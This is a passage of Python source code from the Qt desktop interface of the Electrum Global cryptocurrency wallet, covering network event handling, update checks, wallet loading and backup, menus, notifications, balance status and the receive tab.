QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Global Testnet" if constants.net.TESTNET else "Electrum Global"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin Global network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://bitcoin-global.io"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitglobal:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum Global",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum Global", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum Global", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter="",
*, default_extension: str = None,
default_filter: str = None) -> Optional[str]:
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(self, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
self.config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Global addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('Request'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('On-chain'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
